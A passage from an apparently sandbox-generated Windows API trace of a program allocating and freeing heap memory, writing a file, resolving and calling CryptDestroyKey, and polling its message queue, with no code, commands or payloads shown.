hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0151.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0151.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0151.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x3bf0050 [0151.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f43d60 | out: hHeap=0x970000) returned 1 [0152.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0152.070] TranslateMessage (lpMsg=0x8cf708) returned 0 [0152.071] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0152.071] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0152.071] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0152.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0152.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0152.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0152.071] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f14010 [0152.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.074] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x9908, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x9908, lpOverlapped=0x0) returned 1 [0152.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0152.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0152.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0152.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0152.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0152.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0152.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.079] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0152.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0152.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ea8 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0152.079] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0152.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.080] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0152.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0152.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0152.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50878, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0152.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0152.083] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.083] CryptDestroyKey (hKey=0xa87350) returned 1 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0152.084] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.085] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0152.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0152.085] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0152.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0152.086] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.086] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 